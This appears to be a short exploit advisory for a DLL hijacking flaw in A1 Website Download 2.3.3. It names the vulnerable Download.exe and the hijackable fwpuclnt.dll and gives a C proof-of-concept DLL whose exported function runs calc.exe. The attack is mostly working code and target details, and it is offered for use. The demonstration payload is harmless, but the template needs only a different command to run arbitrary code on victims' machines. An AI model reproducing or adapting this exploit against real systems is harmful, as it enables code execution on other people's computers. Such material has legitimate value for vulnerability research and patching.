A1 Website Download version 2.3.3 suffers from a DLL hijacking vulnerability.
e34a2611e6c6c6ddd23914805b2afa8b69d1fbffa2542cbbc7bea9b29e867178
#############################################
A1 Website Download dll hijacking vulnerability
software : http://www.microsystools.com
version : 2.3.3
author : d3c0der - d3c0der@hotmail.com
website : www.attackerz.ir
############################################
file :
Download.exe
Vulnerable dll :
fwpuclnt.dll
#############################################
simple exploit by TheLeader and H.D. Moore
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void DwmSetWindowAttribute() { egg(); }
int egg()
{
system ("calc");
exit(0);
return 0;
}
##############################################